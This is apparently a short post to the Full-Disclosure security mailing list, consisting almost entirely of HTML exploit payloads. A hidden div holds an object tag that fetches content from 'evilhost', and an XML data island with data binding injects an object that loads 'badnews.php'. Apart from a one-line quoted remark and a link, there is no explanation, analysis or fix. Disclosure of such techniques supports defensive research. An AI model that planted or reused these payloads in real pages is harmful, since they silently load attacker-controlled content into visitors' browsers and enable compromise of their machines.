> this works too...
>
> <div style="display.none"><object data="http://evilhost/realbad.asp">
> </object>oh</div>

http://www.malware.com/greymagic.html

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnews.php"></object>
]]>
</exploit>
</security>
</xml>

-- 
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
